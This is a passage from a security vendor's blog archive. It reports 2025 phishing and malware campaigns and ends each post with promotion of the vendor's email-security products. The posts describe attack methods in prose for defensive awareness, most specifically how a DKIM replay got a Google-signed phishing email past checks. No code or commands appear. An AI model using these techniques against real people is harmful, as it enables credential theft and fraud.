{ "id": "b7b9dda2-b2fe-46a1-97ab-90226361ef7c", "created_at": "2026-04-06T00:20:04.799517Z", "updated_at": "2026-04-10T03:37:33.106715Z", "deleted_at": null, "sha1_hash": "32e7e9e18d0785cf45592e6d76a9440c5d0d2d46", "title": "Blog Archive - SpamTitan Email Security", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 1667639, "plain_text": "Blog Archive - SpamTitan Email Security\r\nBy G Hunt\r\nArchived: 2026-04-05 19:50:54 UTC\r\nDKIM Replay Phishing Attempt Spoofs Google and Passes Validation Checks\r\nby | April 30, 2025 | Phishing \u0026 Email Spam\r\nHackers have exploited a ‘vulnerability’ to conduct a phishing campaign that made it appear that the phishing\r\nemail had been sent by Google from the no-reply[@]accounts.google.com address. The email was signed by\r\nGoogle and passed the DomainKeys Identified Mail (DKIM) authentication check, suggesting the email had been\r\nsent from a genuine Google account and was authentic, although the email had been sent from a different, non-Google address.\r\nThe campaign was identified by developer Nick Johnson, who received an email seemingly sent from no-reply[@]accounts.google.com with the subject Security Alert. The email claimed that Google LLC had been\r\nsubpoenaed to obtain a copy of the contents of his Google account and that a support case had been opened and\r\ntransferred to Legal Investigations Support. A support reference number was included along with a link to a\r\nGoogle Sites website, encouraging him to click the link to examine the case materials and “submit a protest,” if\r\nnecessary, via the option on the support website.\r\nThe lure used in this phishing attempt is similar to many other phishing campaigns that threaten legal action or\r\nwarn about police investigations, although what makes the attempt stand out is how the phisher managed to make\r\nthe email appear to have been sent by Google and pass the DKIM authentication check, resulting in the email\r\nbeing delivered to his inbox.\r\nWhile the subject matter was potentially serious, and the email had seemingly been sent by Google, there was a\r\nred flag that suggested a phishing attempt. As was noticed by Johnson, the link in the email did direct him to an\r\nofficial Google site, but it was sites.google.com, a free web-building platform provided by Google for users to\r\ncreate and host free web pages for personal purposes. No official email from Google would direct a user to that\r\nplatform, and certainly not any message about a subpoena requiring the disclosure of the contents of their Google\r\nemail account. The link directed Johnson to a fake support portal – a carbon copy of the official support portal,\r\nwhich had been scraped from the official site. The aim of the phish appears to have been to trick Johnson into\r\nlogging in and disclosing his login credentials, allowing his Google account to be hijacked.\r\nAn analysis of the phishing attempt revealed Google was tricked into signing the email, thus allowing the message\r\nto bypass spam filtering service since the email successfully passed the DKIM and DMARC authentication\r\nchecks. Closer inspection of the message header revealed the mailed-by address was different from the from\r\naddress, and had been sent in what is known as a DKIM replay attack.\r\nThe message was actually sent to a me@ address at a domain that appeared to be managed by Google. According\r\nto Johnson, the attackers registered a domain and created a Google account for the me[@]domain.com, then\r\nhttps://www.spamtitan.com/blog/emotet-malware-revives-old-email-conversations-threads-to-increase-infection-rates/\r\nPage 1 of 136\n\ncreated a Google OAuth app and used the entire phishing message for its name, which was then added to the name\r\nfield. They granted themselves access to the email address in Google Workspace, then Google sent an alert to the\r\nme[@]domain.com account. The email was then forwarded to Johnson, and since the email had been generated by\r\nGoogle, it was able to pass the DKIM check as the parts of the message that DKIM checks had not been altered.\r\nThe vulnerability that was exploited was the fact that DKIM checks the message and the headers, not the\r\nenvelope, which meant the email passed the validation checks because it had a valid signature. Since the exact\r\nemail was extracted and saved without making any modifications to what was signed by DKIM, the validation\r\nchecks were passed. Further, since the email was sent to a me@ email address, it shows that the message was\r\ndelivered to the victim’s email address. Google explained in response to a query that it is aware of the phishing\r\nattempt and has rolled out protections to prevent further abuse.\r\nThe phishing attempt demonstrates the importance of stopping and thinking before clicking on any link in an\r\nemail, no matter how serious the potential threat. The phishing attempt could have easily led to a compromised\r\nGoogle account had he not stopped to think about the request. Others may not have been as fortunate. While this\r\nwas the first time that Google is known to have been affected by a DKIM replay attack, it is a known phishing\r\ntechnique and one that can be highly effective.\r\nSecurity awareness training should make it clear that all emails can potentially contain a threat, even if the sender\r\nappears to be legitimate. Phishing lures related to legal threats, police investigations, and subpoenas should be\r\nincluded in the training as these are likely to create the fear that leads to a rapid click, and employees should be\r\ntold to inspect the message headers to see the sender’s address and told to report any potential threat or suspicious\r\nemail to their security team. They should also be provided with an easy one-click method of doing so in their\r\nemail client.\r\nBusinesses should also ensure they have advanced anti-spam software with email sandboxing and URL filtering,\r\nand have multifactor authentication set up for all email accounts, with phishing-resistant multifactor\r\nauthentication implemented when possible for the greatest protection.\r\nMicrosoft Teams Used in Tech Support Scam Targeting Female Executives\r\nby G Hunt | April 28, 2025 | Security Awareness\r\nA new campaign has been identified that abuses Microsoft Teams to deliver malware in a tech support scam,\r\nwhere the user is tricked into believing they need assistance to resolve a technical issue that requires them to grant\r\naccess via the built-in Microsoft remote monitoring and management tool, Windows Quick Assist.\r\nTech support scams are a very common form of cybercrime. According to the FBI’s Internet Crime Complaint\r\nCenter (IC3), 36,002 complaints were received about tech support scams in 2024, making it the 6th most\r\ncommonly reported cybercrime, and the third biggest cause of losses, with more than $1.46 billion lost to the\r\nscams in 2024 alone. It should be noted that many victims fail to report these scams to the FBI, so the number of\r\nvictims and the losses are likely to be substantially higher.\r\nWhile the companies impersonated are highly varied, these scams typically involve contact being made with the\r\nvictim, with the scammer impersonating a member of the technical support team to resolve a fictitious technical\r\nhttps://www.spamtitan.com/blog/emotet-malware-revives-old-email-conversations-threads-to-increase-infection-rates/\r\nPage 2 of 136\n\nissue. To make these scams more realistic, threat actors may add a targeted individual to numerous newsletters and\r\nspam sources, and then call to help them resolve the spam problem that the threat actor has created.\r\nOne of the latest scams saw contact made via Microsoft Teams on targets in the services sector, including finance,\r\nprofessional, and scientific services. One common denominator was that the targeted individuals all had female-sounding names, most of whom were executive-level employees. The scam was also conducted at specific times,\r\nbetween 2 p.m. and 3 p.m. local time, which the threat actors perceived would be the ideal time when attention\r\nwould likely be reduced and the scam was most likely to succeed.\r\nThe Teams request was accompanied by a vishing call. Over the phone, the target was convinced to run a\r\nPowerShell command that was delivered via a Microsoft Teams message, which downloaded the first-stage\r\npayload. The QuickAssist tool was used by the threat actor for remote access to ensure the deployment of\r\nPowerShell, all under the guise of resolving a fictitious technical issue.\r\nThe threat actor used QuickAssist to deliver a signed file named Team Viewer.exe to a hidden folder, with that\r\nexecutable likely to be undetected as it would be hidden in normal system activity. The file was used to sideload a\r\nmalicious DLL called TV.dll, which was used to deliver a second-stage JavaScript-based backdoor, providing\r\npersistent access to the user’s device. Persistence was achieved by modifying Registry entries.  The campaign was\r\nidentified by a ReliaQuest researcher and was attributed to a tracked threat actor that uses vishing attacks to infect\r\nusers with malware, often leading to a ransomware attack. One method of blocking these attacks is to configure\r\nMicrosoft Teams to block external communications to prevent the initial contact, and if Windows Defender is\r\nused, to set it to the most restrictive setting to limit the use of PowerShell.\r\nUltimately, this scam succeeded because an end user was contacted, and social engineering techniques were used\r\nto trick them into taking the actions that the threat actor could not otherwise have performed externally. The\r\nrecently published Verizon Data Breach Investigations Report revealed that 60% of data breaches involved the\r\nhuman element, with social engineering one of the most common ways that employees are tricked. It is not\r\nnecessary for threat actors to spend countless hours trying to find zero-day vulnerabilities in software solutions\r\nwhen they can just contact employees and get them to provide the access they need.\r\nAs the IC3 data shows, these scams are lucrative for threat actors, and one of the reasons why they are so\r\nsuccessful is that they tend to take place over the phone, bypassing the need to defeat anti-spam software and\r\nother technical security measures. Since legitimate remote access tools are used, the malicious activity is easy to\r\nhide within normal system activity.\r\nSecurity awareness training can go a long way toward improving defenses against these types of scams.\r\nExecutives were targeted in this campaign as they have higher-level privileges than other workers, but security\r\nawareness training is often less robust at the executive level. It is important to ensure that all members of the\r\nworkforce,e from the CEO down, are provided with security awareness training, and for the training courses to be\r\ntailored to different roles and the specific threats that each is likely to encounter.\r\nWith the SafeTitan security awareness training platform, it is easy to create tailored training programs for different\r\nmembers of the workforce and the unique threats that they face, including specific programs for the CEO and\r\nexecutives, the HR department, and the IT team. With the SafeTitan platform, there are hundreds of training\r\nmodules tailored to different aspects of cybersecurity and different threats, making it quick and easy to create and\r\nhttps://www.spamtitan.com/blog/emotet-malware-revives-old-email-conversations-threads-to-increase-infection-rates/\r\nPage 3 of 136\n\ndeliver highly effective training courses covering phishing and other email-based attacks, smishing, vishing, and\r\nother cyber threats.\r\nGive the TitanHQ team a call today for more information on improving your cybersecurity defenses and security\r\nawareness training programs. All TitanHQ solutions are available on a free trial, with support provided to make\r\nsure you get the most out of your trial.\r\nThe Human Element is Involved in 60% of Data Breaches\r\nby G Hunt | April 26, 2025 | Phishing \u0026 Email Spam\r\nThe latest data from Verizon has revealed that phishing was the third most common method of initial access in the\r\ndata breaches the firm analyzed for its 2025 Data Breach Investigations Report. Phishing accounted for 16% of all\r\ndata breaches in 2025, having been overtaken by vulnerability exploitation (20%). The leading initial access\r\nmethod was credential misuse, which was involved in 22% of data breaches. Verizon does note, however, that\r\nwhile incident responders may identify compromised credentials as the cause, it is not always clear how those\r\ncredentials were obtained. It is possible that they were obtained in a previous phishing attack that went undetected,\r\nso phishing may have been involved in a higher percentage of data breaches.\r\nThe report highlights the extent to which cybercriminals exploit human weaknesses. The human element was\r\ninvolved in approximately 60% of data breaches in 2024, down slightly from the 61% of data breaches the\r\nprevious year. The human element could involve a click on a link in a phishing email, resulting in the theft of\r\ncredentials, a visit to a malicious website where malware is downloaded, a misconfiguration that is exploited, or a\r\nresponse to a phone call or text message. In 32% of data breaches, the human element was ascertained to result in\r\ncredential abuse, 23% involved social interactions, 14% involved errors, and 7% involved interactions with\r\nmalware.\r\nThis year’s report delves into the importance of security awareness training and how providing regular training\r\ncan really make a difference to an organization’s security posture, especially when combined with phishing\r\nsimulations. Providing training to the workforce will teach employees about security best practices, which will\r\nhelp to eradicate risky behaviors. Employees should be taught how to identify a phishing email and be conditioned\r\nto report any suspicious emails to their security team immediately. Phishing simulations help to reinforce training\r\nand identify individuals who have failed to apply the training. If an individual fails a phishing simulation, they can\r\nbe provided with additional training to help ensure they do not make a similar identification error in the future.\r\nThe report revealed that out of the companies that provided security awareness training and conducted phishing\r\nsimulations, there was a much higher reporting rate when employees had received training more recently. The\r\nbaseline reporting rate was 5%, which shot up to 21% with recent training.\r\nThe data shows why it is so important to provide ongoing security awareness training to keep cybersecurity\r\nmatters fresh in the mind. It is also important to incentivize employees to report potential phishing emails rather\r\nthan punish those who don’t, and to clearly explain that reporting suspicious emails helps security teams to\r\ncontain threats more quickly and limit the damage. It is also important to make it as easy as possible for\r\nemployees to report potential threats. Ideally, employees should be able to report a potential phishing or scam\r\nemail with a single click in their email client.\r\nhttps://www.spamtitan.com/blog/emotet-malware-revives-old-email-conversations-threads-to-increase-infection-rates/\r\nPage 4 of 136\n\nTitanHQ offers an email security suite that includes the SpamTitan cloud-based anti-spam service and the\r\nPhishTitan phishing prevention and remediation solution for Microsoft 365 users.  SpamTitan incorporates dual\r\nanti-virus engines for detecting known malware, email sandboxing for detecting novel threats, AI and machine-based learning algorithms for identifying phishing and spam emails, plus SPF, DKIM \u0026 DMARC, allow listing,\r\nblocking, greylisting, and dedicated real-time block lists. An email client add-in is also provided to allow\r\nemployees to easily report potential threats.\r\nThe PhishTitan solution is based on the same engine that powers SpamTitan, incorporating AI and machine\r\nlearning to detect phishing threats, and also adds banner notifications for emails to warn employees about\r\npotential threats from external email addresses. The remediation tools provided by PhishTitan allow security\r\nteams to rapidly respond to threats and eliminate them from their email system.\r\nBoth email security solutions have high detection accuracy and provide best-in-class protection from email\r\nthreats. In recent independent tests at VirusBulletin, the solutions were demonstrated to have exceptional detection\r\naccuracy, blocking in excess of 99.99% of spam and phishing threats, and thanks to the email sandbox service,\r\nTitanHQ’s solutions blocked 100% of malware.\r\nTitanHQ can also help with security awareness training and phishing simulations. The SafeTitan platform makes it\r\neasy to create and automate continuous security awareness training programs for the workforce. The training\r\ncontent is enjoyable and interactive and is delivered using computer-based training, with individual modules\r\ntaking no more than 10 minutes to complete.\r\nThe training content is regularly updated and has been proven to improve security awareness and reduce\r\nsusceptibility to cyber threats, especially when combined with TitanHQ’s phishing simulator. Internal simulated\r\nphishing campaigns can be created and automated, and will automatically generate additional training\r\nimmediately in response to a security failure, ensuring training is delivered at the time when it is most likely to be\r\neffective.\r\nThrough security awareness training and phishing simulations, organizations can reduce the employee errors that\r\ncause so many data breaches, and by using TitanHQ’s email security suite, threats will be blocked before\r\nemployees’ security awareness is put to the test.\r\nGive the TitanHQ team a call today to discuss the best options for improving your defenses. All TitanHQ solutions\r\nare available on a free trial and assistance can be provided to help you get the most out of the free trial.\r\nUK Government Survey Confirms Phishing is the Biggest Threat to UK Businesses\r\nby G Hunt | April 25, 2025 | Phishing \u0026 Email Spam\r\nA recently published report commissioned by the UK’s Home Office and Department for Science Innovation and\r\nTechnology (DSIT) has revealed that 43% of UK businesses and 30% of UK charities experienced a cybersecurity\r\nbreach in the past 12 months.\r\nWhile there was a slight fall in the number of businesses and charities suffering a cybersecurity incident, there was\r\na significant increase in ransomware attacks. The survey was conducted on 2,180 businesses, 1,081 charities, and\r\nhttps://www.spamtitan.com/blog/emotet-malware-revives-old-email-conversations-threads-to-increase-infection-rates/\r\nPage 5 of 136\n\n574 educational institutions. Based on the number of confirmed cyber incidents, that equates to around 612,000\r\nUK businesses and 61,000 UK charities experiencing a cyber breach or a cyberattack in the past 12 months.\r\nWhile there was a slight decline in cyber incidents, which were confirmed by 50% of businesses in last year’s\r\nstudy, it is clear that hacking and other types of cyber incidents continue to pose a massive threat to UK\r\nbusinesses, with ransomware attacks of particular concern. According to the report, the estimated percentage of\r\nransomware crime increased from less than half a percent in 2024 to 1% in 2025, which suggests that around\r\n19,000 UK businesses experienced a ransomware incident in the past 12 months. 4% of large businesses and 3%\r\nof medium-sized businesses admitted to paying the ransom demand to recover their data and prevent its\r\npublication online.\r\nThe biggest cyber threat to UK businesses by some distance is phishing. Phishing is the fraudulent practice of\r\nsending emails or other messages that trick individuals into disclosing sensitive information such as login\r\ncredentials or installing malware. Over the past 12 months, 93% of businesses and 95% of charities that\r\nexperienced a cybercrime incident identified phishing as the cause of at least one of those incidents. Businesses\r\nthat were confirmed victims of cybercrime in the past 12 months experienced an average of 30 cybercrime\r\nincidents in the past 12 months, with charities experiencing an average of 16 cybercrime incidents.\r\nThe credentials stolen in these attacks and the malware installed give cybercriminals initial access to internal\r\nnetworks. From there, they can deploy additional malware payloads and ransomware and steal sensitive data. The\r\nphishing problem is also getting worse for businesses, as cybercriminals are leveraging large language models\r\n(LLMs) to craft extremely convincing phishing emails and conduct phishing attacks at scale. These tools can be\r\nused to generate fake images, make phishing lures more believable, and make them harder to detect.\r\nWith phishing such a major threat and the high cost of dealing with each phishing incident, UK businesses and\r\ncharities need to have email security defenses capable of detecting and blocking phishing threats, including those\r\ndeveloped using AI and LLMs.\r\nPhishing defenses should consist of anti-spam software, multifactor authentication, and end user security\r\nawareness training as a minimum. Advanced email filtering software incorporates antivirus software to identify\r\nknown malware threats, email sandboxing for detecting novel malware threats, link scanning, and machine\r\nlearning and AI-aided detection.\r\nOver the past three quarters, SpamTitan from TitanHQ has consistently demonstrated in independent tests that it is\r\ncapable of blocking even the most advanced threats, routinely achieving a 100% malware detection rate, and\r\nphishing and spam detection rates in excess of 99.99%.\r\nTitanHQ also offers a comprehensive security awareness training and phishing simulation platform – SafeTitan –\r\nfor improving awareness of cyber threats. When combined with phishing simulations, the platform has been\r\nshown to reduce employee susceptibility to phishing by up to 80%. The training content is enjoyable and\r\nmemorable, and is delivered in training modules of no more than 10 minutes to maximize knowledge retention\r\nand make training easy to fit into busy workflows.\r\nAll TitanHQ solutions have been developed to provide powerful protection and advanced features, while also\r\nbeing easy to set up, configure, and use. Further, they are available at a price point that is affordable for businesses\r\nhttps://www.spamtitan.com/blog/emotet-malware-revives-old-email-conversations-threads-to-increase-infection-rates/\r\nPage 6 of 136\n\nof all sizes. Give the TitanHQ team a call today to find out more about improving your defenses against phishing\r\nand other cyber threats. Further, TitanHQ’s cloud-based anti-spam service and security awareness training\r\nplatform are available on a free trial, allowing you to put them to the test before making a purchase decision.\r\nWine-Tasting Phishing Emails Used to Target Embassy Staff in Malware\r\nCampaign\r\nby G Hunt | April 24, 2025 | Phishing \u0026 Email Spam\r\nA phishing scam has been identified targeting staff of European embassies with an invitation to a fake wine-tasting\r\nevent. Targets include European diplomats and the staff of non-European countries at embassies located in\r\nEurope. The campaign has been linked to the Russian state-sponsored hacking group, Cozy Bear (aka APT29,\r\nMidnight Blizzard), and is believed to be primarily an espionage campaign.\r\nThe aim of the campaign is to deliver a stealthy new backdoor malware dubbed GrapeLoader. The campaign,\r\nidentified by Check Point, is believed to be part of a wider campaign targeting European governments, diplomats,\r\nand think tanks. The malware delivered in the campaign serves as a loader for delivering additional payloads and\r\nis used as an initial stage tool for fingerprinting and establishing persistence.\r\nAs is typical with spear phishing campaigns, considerable effort has been put into creating a lure that is likely to\r\nelicit a response. A fake diplomatic event is used, commonly related to wine tasting, with some emails offering a\r\nplace at a diplomatic dinner. The messages were sent by a specific individual at a legitimate but impersonated\r\nEuropean foreign affairs ministry. A series of follow-up messages is sent to individuals who failed to respond to\r\nthe fake invite. The phishing link is also configured to redirect the user to the real foreign ministry website if it is\r\nopened outside of the expected timezone or by an automated tool.\r\nThe emails prompt the recipient to click on an embedded hyperlink that directs them to a spoofed website where\r\nthey are prompted to download a file. If successful, the user downloads a zip file containing a PowerPoint\r\nexecutable file called wine.exe, and two hidden DLL files, one of which allows the PowerPoint file to run. The\r\nPowerPoint file is used for DLL sideloading, including the other DLL file, dubbed GrapeLoader, which is used to\r\ndeliver additional payloads. GrapeLoader fingerprints the device and establishes contact with its command-and-control server. A Run registry key is added to ensure that wine.exe is executed following a reboot.\r\nThe malware has been designed to be stealthy, including masking strings in its code and only decrypting them for\r\na short time in the memory before they are erased. This technique prevents analysis using tools such as FLOSS.\r\nThe malware also makes memory pages temporarily inaccessible to evade antivirus scans. GrapeLoader is thought\r\nto lead to the delivery of a modular backdoor known as WineLoader, which has been used in previous Cozy Bear\r\ncampaigns on governments and political parties.\r\nGetShared and Other Legitimate Services Abused in Phishing Campaigns\r\nby G Hunt | April 22, 2025 | Phishing \u0026 Email Spam\r\nOne of the common tactics for getting phishing emails into inboxes is to use a legitimate service to send the\r\nemails, as the messages are far less likely to be blocked by email security solutions. Email security solutions\r\nhttps://www.spamtitan.com/blog/emotet-malware-revives-old-email-conversations-threads-to-increase-infection-rates/\r\nPage 7 of 136\n\nperform reputation checks on email addresses and domains, and if they are determined to have been used for\r\nspamming or sending malicious emails, they are rapidly added to real-time blocklists (RBLs). If a certain\r\ntrustworthiness threshold is exceeded, the messages will be blocked and quarantined, ensuring they do not reach\r\ntheir intended targets.\r\nThese reputation checks are often passed if emails are sent via trusted services such as Dropbox and Google\r\nCalendar, and similarly if malicious files or content are hosted on legitimate services such as OneDrive, GitHub,\r\nGoogle Drive, or SharePoint. The fact has not been lost on threat actors, who regularly abuse these services.\r\nFake login pages may be hosted on cloud storage services, and malicious files shared through them. Not only can\r\nthese emails evade checks due to the good reputation of the sites, these well-known brands are familiar to end\r\nusers and are often trusted, increasing the probability that credentials will be divulged or files will be downloaded.\r\nFor instance, a recent campaign abusing Dropbox used the platform to send an email about a shared file, which\r\nwas also hosted on a legitimate Dropbox account. The email contained a link to a malicious PDF file, branded\r\nwith the details of a company known to the targeted employees. The PDF file contained a link to another,\r\nunrelated website, where a malicious file was hosted. The phishing emails used a plausible lure to convince the\r\nuser to click the link and download and execute the file.\r\nA new campaign has recently been identified that uses a different legitimate service to evade reputation checks.\r\nThe campaign, detected by security researchers at Kaspersky, was sent via a service called GetShared. While not\r\nas well-known as Google Calendar or Dropbox, the platform had a vulnerability that could be abused to send\r\nemails from a trusted domain and file-sharing service.\r\nSimilar to the Dropbox campaign, GetShared was used to send an email to targeted individuals advising them that\r\na file had been shared with them via GetShared, as it was too large to send via email. The use of the file-sharing\r\nservice seems reasonable, and the urgency was believable. The user was told that the file would be deleted after a\r\nmonth, and they were asked to provide a quote including the delivery time and payment terms. One of the\r\nintercepted emails targeted a designer using a shared file called DESIGN LOGO.rar.\r\nThe user was given a download button, which links to the site where the file can be downloaded. If the\r\ncompressed file is opened and the contents extracted, there are several possible attack methods. An executable file\r\ncould be in the compressed file that has a double file extension, making it likely that the file would be executed.\r\nPotentially, the file could contain a link to a malicious document or phishing page, although in this case, it was\r\npart of a vishing campaign. The compressed file contained contact details for the user to call, which would require\r\na file download or disclosure of credentials or other sensitive information.\r\nEarlier this year, a campaign was identified that used Google Calendar, with the emails sent through the platform\r\ncontaining a calendar invite. The invite is automatically added to the user’s Google Calendar account if they have\r\nCalendar set up and configured to automatically accept invitations. The invite contained a link to Google Forms or\r\nGoogle Drawings, which contained a link to a phishing website. That website impersonated a well-known brand\r\nand required the user to log in with their credentials. The campaign targeted more than 300 brands including\r\nhealthcare providers, educational institutions, banks, and others, and involved thousands of emails.\r\nhttps://www.spamtitan.com/blog/emotet-malware-revives-old-email-conversations-threads-to-increase-infection-rates/\r\nPage 8 of 136\n\nTraditional email security solutions are unlikely to block emails from these trusted senders, and malicious files\r\nhosted on trusted platforms are also unlikely to be blocked. Businesses can combat these types of phishing attacks\r\nby using advanced email spam filter that incorporates AI and machine learning algorithms and email sandboxing\r\nin addition to the standard reputation checks and blacklists. The best spam filters for businesses provide multiple\r\nlayers of protection to block these malicious emails and prevent them from reaching inboxes; however, due to the\r\ndifficulty in distinguishing genuine from malicious communications from legitimate platforms, security awareness\r\ntraining is vital.\r\nEmployees should be trained on how to identify phishing emails and told not to trust emails from legitimate\r\nplatforms, as while the platforms can be trusted, the content cannot. It is also recommended to use a phishing\r\nsimulator to run simulations of phishing using lures that abuse trusted platforms to gauge how employees respond\r\nand provide targeted training to individuals who are tricked by these campaigns.\r\nSocGholish Malware Used to Deliver RansomHub Ransomware\r\nby G Hunt | March 31, 2025 | Internet Security, Phishing \u0026 Email Spam, Security Awareness\r\nRansomHub is one of the most prolific ransomware-as-a-service (RaaS) groups now that the ALPHV/BlackCat\r\noperation has shut down and the LockBit operation has been hit with successive law enforcement actions.\r\nRansomHub engages in double extortion tactics, exfiltrating sensitive data from victims’ networks and encrypting\r\nfiles. Victims must pay to obtain the keys to decrypt their data and to prevent the publication of the stolen data on\r\nthe RansomHub data leak site. Since emerging in early 2024, the group has conducted more than 200 attacks.\r\nAs a RaaS operation, RansomHub uses affiliates to conduct attacks in exchange for a percentage of any ransom\r\npayments they generate. The affiliates each have their specialties for breaching victims’ systems, including\r\nphishing, remote desktop protocol attacks, and the exploitation of unpatched vulnerabilities. Now, a new tactic is\r\nbeing used – The group is using the SocGholish malware-as-a-service (MaaS) framework for initial access,\r\nespecially in attacks on the government sector.\r\nSocGholish, also known as FakeUpdates, uses an obfuscated JavaScript loader that is primarily delivered via\r\ncompromised legitimate websites. After compromising a website, malicious scripts are added that redirect users to\r\nwebpages that display browser update notifications. These sites use social engineering to trick visitors into\r\ndownloading a browser update, as they are told that their browser has a security issue or is not functioning\r\ncorrectly. If the user agrees, they download a zip file that contains a JavaScript file. If that file is executed,\r\nSocGholish malware is installed.\r\nSocGholish is a malware downloader that provides initial access to a victim’s network. The malware has been\r\nused to deliver a wide range of payloads, including AZORult, Gootloader, NetSupport, and Dridex. SocGholish\r\nhas also previously been used to deliver DoppelPaymer ransomware, and now RansomHub ransomware. In the\r\ncase of RansomHub, the group deploys Python-based backdoor components for RansomHub affiliates to use for\r\ninitial access.\r\nPreventing SocGholish infections is critical to preventing RansomHub ransomware attacks; however, prevention\r\nrequires a defense-in-depth approach. Traffic to the compromised websites can come from emails that include\r\nembedded hyperlinks, malvertising, SEO poisoning, and links to compromised websites are also delivered to users\r\nhttps://www.spamtitan.com/blog/emotet-malware-revives-old-email-conversations-threads-to-increase-infection-rates/\r\nPage 9 of 136\n\nvia Google Alerts. The webpages that host the fake browser updates filter traffic, blocking access by sandboxes,\r\nwhich can make detection difficult.\r\nThe best approach is to use an advanced anti-spam software such as SpamTitan to block malicious emails. In the\r\nlast quarterly round of testing at VirusBulletin, SpamTitan, a cloud-based antispam service from TitanHQ, ranked\r\n#1 for malware detection, phishing detection and spam blocking with a 0% false positive rate, and in the February\r\n2025 tests, achieved a perfect score blocking 100% of malware, phishing, and spam emails. The high detection\r\nrate is due to extensive front-end tests, email sandboxing, and machine learning.\r\nA web filter adds an important layer of protection by scanning websites for malicious content and blocking access\r\nto known malicious websites. The WebTitan DNS filter is fed extensive threat intelligence to block access to\r\nknown compromised webpages, can filter websites by category, and can be configured to block downloads of\r\nexecutable files from the Internet. Security awareness training is vital for creating a human firewall. Employees\r\nshould be informed about the risks of interacting with security warnings on the Internet, and taught how to\r\nidentify phishing attempts and be instructed on security best practices. The SafeTitan security awareness training\r\nplatform and phishing simulator platform make creating and automating training courses and phishing simulations\r\na quick and easy process.\r\nQR Code Phishing Scam Requests Verification of Tax Information\r\nby G Hunt | March 31, 2025 | Phishing \u0026 Email Spam\r\nOne of the ways that cybercriminals are bypassing traditional email security solutions is to use QR codes rather\r\nthan embedded hyperlinks in their phishing emails. QR codes are increasingly used by businesses to drive traffic\r\nto web pages, as consumers do not need to go through the process of typing a URL into their browser. The QR\r\ncode can simply be scanned with a smartphone camera, the URL will be recognized, and the web resource can be\r\nvisited with a single tap of the finger.\r\nSpam filtering services will detect links in emails, check them against blacklists of known malicious websites, and\r\nwill often follow the links to find the destination URL. If the website is malicious, the email will not be delivered\r\nto the user’s inbox. By using a QR code rather than a hyperlink, there is an increased chance that the message will\r\nbe delivered, as many anti-spam software solutions are incapable of reading QR codes.\r\nOne such campaign has recently been identified that warns the recipient that they must review and update their tax\r\nrecords. The email has the subject, “urgent reminder,” and claims to have been sent by the Tax Services Team. The\r\nemail has a PDF file attachment and advises the recipient that a review of their tax records must be completed by\r\nApril 16, 2025, to avoid potential penalties. Tax season is well underway and annual tax returns need to be\r\nsubmitted by April 15, 2025, so the deadline for a response is plausible.\r\nRather than include a link, the PDF file includes a QR code, which the user is told they should scan with their\r\nmobile device to access the secure tax portal, where they must log in, review their tax information, and confirm it\r\nis up to date.\r\nIf the QR code is scanned and the link followed, the user must first pass a CAPTCHA test, after which they are\r\npresented with a Microsoft login prompt and asked to enter their password. The form is already populated with the\r\nhttps://www.spamtitan.com/blog/emotet-malware-revives-old-email-conversations-threads-to-increase-infection-rates/\r\nPage 10 of 136\n\nuser’s email address to make it appear that the user is known or has visited the site before, adding an air of\r\nlegitimacy to the scam. If the password is entered, it will be captured and used to hijack the user’s Microsoft\r\naccount. After entering the password, the user is told “We could not find an account with that username. Try\r\nanother account,” which may allow the attacker to steal credentials for another account.\r\nQR code phishing forces users onto a mobile device, which typically has weaker security than a desktop computer\r\nor laptop, plus only the domain name can usually be viewed rather than the full URL, which helps to make the\r\nlink seem legitimate. Phishers also often use open redirects on legitimate websites to make their links appear\r\nauthentic and hide the final destination URL.\r\nWith QR code phishing scams on the rise, it is important to raise awareness of the threat through your security\r\nawareness training program. Employees should be warned that QR codes are commonly used by threat actors, and\r\nnever to follow links encoded in QR codes that arrive via email. It is also recommended to use a phishing\r\nsimulator to assess whether the workforce is susceptible to QR code phishing attempts. The SafeTitan security\r\nawareness training platform allows businesses to easily conduct phishing simulations on the workforce to gauge\r\nsusceptibility to phishing threats. The phishing simulator will generate relevant training content immediately if a\r\nphishing test is failed, ensuring targeted training content is delivered immediately, when it is likely to be most\r\neffective at correcting behavior.\r\nTechnical defenses should also be implemented. An advanced spam filtering service should be used that is capable\r\nof identifying QR codes and following and assessing URLs for phishing content and malware. The outbound spam\r\nfilter of SpamTitan is capable of following QR codes and assessing content, and in recent tests, correctly identified\r\n100% of phishing attempts. SpamTitan also includes email sandboxing for in-depth analysis of email attachments.\r\nA DNS security solution is also recommended for in-depth analysis of URLs for malicious content to provide an\r\nextra layer of protection against phishing and malware.\r\nNew Phishing Kit Dynamically Displays Relevant Landing Pages Based on DNS\r\nQueries\r\nby G Hunt | March 30, 2025 | Phishing \u0026 Email Spam\r\nA new phishing-as-a-service (PhaaS) platform has been identified that highlights the sophistication of phishing\r\nattacks, and how even cybercriminals with limited skill sets can conduct extremely effective phishing campaigns.\r\nOne of the problems when conducting phishing campaigns is ensuring the phishing emails are convincing.\r\nPhishing has traditionally been a numbers game, where large volumes of messages are sent in the knowledge that\r\na small number of individuals will be tricked into responding. Those individuals may simply be busy and respond\r\nwithout taking the time to carefully consider what they are being asked, or individuals with poor security\r\nawareness. Targeted phishing attempts, termed spear phishing, involve research and are tailored to individuals or\r\nsmall numbers of individuals, and because of the targeting, there is a much higher response rate. The trade-off is\r\nthat these campaigns involve considerable time and effort.\r\nThe new PhaaS platform allows a threat actor to tailor the content to display a fake login page relevant to the\r\nindividual receiving the message, while still sending a large volume of phishing emails. The phishing kit allows\r\nindividuals to be tricked by displaying a login prompt that impersonates any of 114 brands in around a dozen\r\nhttps://www.spamtitan.com/blog/emotet-malware-revives-old-email-conversations-threads-to-increase-infection-rates/\r\nPage 11 of 136\n\ndifferent languages, with the content displayed tailored to each individual. The threat actor configures the phishing\r\ncampaign, sends out phishing emails via the PhaaS kit, and the link in the email directs the recipient to a phishing\r\nwebpage. The next stage is where the targeting occurs. The threat actor queries the email domain DNS MX\r\nrecords (DNS over HTTPS) obtained from Cloudflare or Google to identify the user’s email service provider. The\r\nphishing page is then dynamically displayed based on the results of that query, and if no response is received, the\r\nphishing page defaults to Roundcube.\r\nDNS queries are fast, so the query and response occur in a fraction of a second, as is the case when a DNS query\r\nis sent to identify the IP address of a webpage when browsing the internet. As such, there is only a very small\r\ndelay, often unnoticeable to the user, before the content is loaded. The result is that if the user’s email service\r\nprovider is Gmail, they will be presented with a Gmail login prompt, and if they use Microsoft Outlook, they will\r\nbe presented with a Microsoft login prompt. If the user responds and enters their login credentials, they are\r\ncaptured and sent to the collection 